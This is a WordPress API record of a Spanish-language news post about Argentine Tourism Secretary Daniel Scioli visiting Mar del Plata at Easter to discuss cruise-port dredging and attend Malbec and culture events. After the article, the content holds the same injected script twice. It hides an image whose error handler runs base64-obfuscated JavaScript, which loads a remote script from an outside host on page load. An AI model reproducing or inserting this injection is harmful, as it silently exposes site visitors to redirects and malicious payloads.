{"id":5076,"date":"2025-04-21T10:07:19","date_gmt":"2025-04-21T13:07:19","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5076"},"modified":"2025-08-13T23:35:45","modified_gmt":"2025-08-14T02:35:45","slug":"scioli-visita-mar-del-plata-en-semana-santa","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5076","title":{"rendered":"Scioli visita Mar del Plata en Semana Santa"},"content":{"rendered":"\n<p><strong><em>El funcionario se reuni\u00f3 con autoridades para gestionar el dragado del puerto de Mar del Plata para incluir a la ciudad como terminal de cruceros, particip\u00f3 de las celebraciones del D\u00eda Mundial del Malbec y de la Noche del Turismo y la Cultura de esa ciudad costera.<\/em><\/strong><\/p>\n\n\n\n<p>El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,\u00a0<strong>Daniel Scioli<\/strong>, visit\u00f3 la ciudad de\u00a0<strong>Mar del Plata<\/strong>, en el marco del fin de semana extra largo de\u00a0<strong>Semana Santa<\/strong>. Desde all\u00ed destac\u00f3 que\u00a0<em>\u201chay un alt\u00edsimo porcentaje de ocupaci\u00f3n en los principales destinos tur\u00edsticos de todo el pa\u00eds\u201d<\/em>.<\/p>\n\n\n\n<p><em>\u201cEl presidente Milei ha tomado decisiones que han consolidado su compromiso con todos los argentinos para tener un pa\u00eds mejor. El turismo es un pilar estrat\u00e9gico, todo el movimiento que se ve a lo largo y ancho del pa\u00eds, se debe fundamentalmente a la gran conectividad a\u00e9rea gracias a la pol\u00edtica de cielos abiertos\u201d<\/em>, finaliz\u00f3 el\u00a0<strong>Secretario<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/scioli_escollera_mdq.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>El secretario\u00a0<strong>Scioli<\/strong>\u00a0mantuvo un encuentro con el coordinador de productos tur\u00edsticos del Instituto Nacional de Promoci\u00f3n Tur\u00edstica,\u00a0<strong>Alejandro Carrancio<\/strong>, para avanzar con el objetivo de que los cruceros tur\u00edsticos comiencen a llegar al puerto de Mar del Plata, que ya cuenta con la infraestructura de la Base Naval, pero necesita del dragado para perfeccionar el acceso de los cruceros de turismo y el recalado. Esta acci\u00f3n ser\u00eda de un enorme impacto tur\u00edstico para la ciudad.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/scioli_escultura_mdq.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Luego,&nbsp;<strong>Scioli<\/strong>&nbsp;y autoridades del sector, participaron de&nbsp;<strong>\u00abLa Noche del Turismo y la Cultura\u00bb<\/strong>, impulsada por el&nbsp;<strong>Ente Municipal de Turismo y Cultura<\/strong>. La propuesta incluy\u00f3 m\u00e1s de una decena de espacios p\u00fablicos con acceso libre y gratuito, donde vecinos y visitantes disfrutaron de espect\u00e1culos, muestras, visitas guiadas y ferias.<\/p>\n\n\n\n<p>El secretario tambi\u00e9n asisti\u00f3 al&nbsp;<strong>Malbec Tour<\/strong>, en el marco de los festejos por el&nbsp;<strong>D\u00eda Mundial del Malbec<\/strong>, que se celebra en Argentina cada 17 de abril.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:355px;height:auto\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El funcionario se reuni\u00f3 con autoridades para gestionar el dragado del puerto de Mar del Plata para incluir a la ciudad como terminal de cruceros, particip\u00f3 de las celebraciones del D\u00eda Mundial del Malbec y de la Noche del Turismo y la Cultura de esa ciudad costera. El secretario de Turismo, Ambiente y Deportes de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5077,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-5076","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5076"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5076"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5076\/revisions"}],"predecessor-version":[{"id":6515,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5076\/revisions\/6515"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5077"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5076"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5076"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5076"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}